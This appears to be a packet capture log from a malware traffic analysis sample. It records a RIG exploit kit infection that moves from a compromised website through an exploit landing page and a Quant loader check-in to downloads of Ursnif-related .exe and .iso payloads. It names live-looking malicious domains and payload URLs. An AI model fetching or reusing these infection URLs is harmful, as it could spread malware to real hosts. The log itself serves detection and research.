Quant loader Ursnif malware from RIG Exploit Kit EK PCAP file download Traffic Analysis Sample

2016-10-25 11:46:51.191792 IP 192.168.2.50.49192 > 192.232.206.125.80: Flags [P.], seq 1:249, ack 1, win 16537, length 248: HTTP: GET / HTTP/1.1
E.. ..@……..2…}.(.P…..J..P.@.u=..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: scadradio.org
Connection: Keep-Alive

2016-10-25 11:46:51.364390 IP 192.232.206.125.80 > 192.168.2.50.49192: Flags [.], ack 249, win 123, length 0
E..(H.@.8……}…2.P.(.J……P..{….

.@……..2..oR.;.P…..m.YP.@.:G……..
2016-10-25 11:46:56.365015 IP 192.168.2.50.49211 > 176.223.111.82.80: Flags [P.], seq 1:458, ack 1, win 16537, length 457: HTTP: GET /?x3qJc7ieKxvGDIA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpPWqUOPYgJH-8SWELU6jQukzbMWd54ilRCF7jJVyLxLQFFd HTTP/1.1
E…
.@…   ….2..oR.;.P…..m.YP.@…..GET /?x3qJc7ieKxvGDIA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpPWqUOPYgJH-8SWELU6jQukzbMWd54ilRCF7jJVyLxLQFFd HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://scadradio.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: po1289k.kremalopsi.gq
Connection: Keep-Alive

 

2016-10-25 11:47:23.483901 IP 192.168.2.50.49228 > 104.238.131.117.80: Flags [P.], seq 1:341, ack 1, win 16537, length 340: HTTP: GET /ioqmy6chaa/q/index.php?id=74400844&c=1&mk=319850 HTTP/1.1
E..|..@…;&…2h..u.L.P.s9..0.lP.@.>…GET /ioqmy6chaa/q/index.php?id=74400844&c=1&mk=319850 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: loremipsumdolorsitamet.pw
Connection: Keep-Alive

2016-10-25 11:47:23.601685 IP 104.238.131.117.80 > 192.168.2.50.49228: Flags [.], ack 341, win 980, length 0
E..(.M@.8..?h..u…2.P.L.0.l.s:.P…c1..
2016-10-25 11:47:23.854582 IP 104.238.131.117.80 > 192.168.2.50.49228: Flags [P.], seq 1:347, ack 341, win 980, length 346: HTTP: HTTP/1.1 200 OK

E..(..@…’f…2R….M.P.t…..oP.@………..
2016-10-25 11:47:24.271842 IP 192.168.2.50.49229 > 82.165.174.205.80: Flags [P.], seq 1:310, ack 1, win 16537, length 309: HTTP: GET /img/381m6bv285.exe HTTP/1.1
E..]..@…&0…2R….M.P.t…..oP.@…..GET /img/381m6bv285.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: institut-angeetbeaute.fr
Connection: Keep-Alive

2016-10-25 11:47:24.484048 IP 82.165.174.205.80 > 192.168.2.50.49229: Flags [.], seq 1:1351, ack 310, win 516, length 1350: HTTP: HTTP/1.1 200 OK
E..nw\@.v…R……2.P.M…o.t..P…….HTTP/1.1 200 OK
Content-Type: application/octet-stream

!@.-.yJ…….2.P.N..’..C.YP.r..7..
2016-10-25 11:48:01.761117 IP 192.168.2.50.49230 > 46.30.215.31.80: Flags [P.], seq 1:110, ack 1, win 64800, length 109: HTTP: GET /micha/fsa/zj47dn49.iso HTTP/1.1
E….*@…”….2…..N.P.C.Y..’.P.. ….GET /micha/fsa/zj47dn49.iso HTTP/1.1
Host: gingapura.de
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-25 11:48:01.941251 IP 46.30.215.31.80 > 192.168.2.50.49230: Flags [.], ack 110, win 29200, length 0
EH.(.2@.-..8…….2.P.N..’..C..P.r…..
2016-10-25 11:48:01.942021 IP 46.30.215.31.80 > 192.168.2.50.49230: Flags [.], seq 1:1301, ack 110, win 29200, length 1300: HTTP: HTTP/1.1 200 OK
EH.<.3@.-..#…….2.P.N..’..C..P.r..K..HTTP/1.1 200 OK
Date: Tue, 25 Oct 2016 13:17:15 GMT

E..(.}@….)…2%0z..R.P..^.k.wpP.@.P………
2016-10-25 11:48:21.713804 IP 192.168.2.50.49234 > 37.48.122.26.80: Flags [P.], seq 1:178, ack 1, win 16537, length 177: HTTP: GET / HTTP/1.1
E….~@….w…2%0z..R.P..^.k.wpP.@.XF..GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0.0) Gecko/20100101 Firefox/40.0.0
Host: curlmyip.net
Connection: Keep-Alive
Cache-Control: no-cache